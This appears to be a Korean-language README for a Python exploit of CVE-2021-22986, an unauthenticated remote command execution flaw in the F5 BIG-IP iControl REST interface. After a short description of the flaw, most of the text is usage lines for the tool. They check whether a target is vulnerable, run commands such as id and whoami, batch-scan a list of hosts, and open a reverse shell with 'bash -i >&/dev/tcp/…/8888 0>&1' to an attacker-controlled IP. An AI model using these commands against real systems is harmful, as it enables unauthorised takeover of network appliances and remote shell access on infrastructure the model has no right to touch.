
CVE-2021-22986 & F5 BIG-IP RCE
이 취약점은 BIG-IP 관리 인터페이스 및 자체 IP 주소를 통해 iControl REST 인터페이스에 네트워크 접근 권한이 있는 인증되지 않은 공격자가 임의의 시스템 명령을 실행하고, 파일을 생성하거나 삭제하며, 서비스를 비활성화할 수 있도록 합니다. 이 취약점은 제어 평면(control plane)을 통해서만 악용될 수 있으며, 데이터 평면(data plane)을 통해서는 악용될 수 없습니다. 악용될 경우 시스템 전체가 손상될 수 있습니다. Appliance 모드의 BIG-IP 시스템도 취약합니다.
기본 사용법
python3 CVE_2021_22986.py

취약점 확인
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

명령 실행:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

배치 스캔
python3 CVE_2021_22986.py -s true -f check.txt

리버스 셸
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991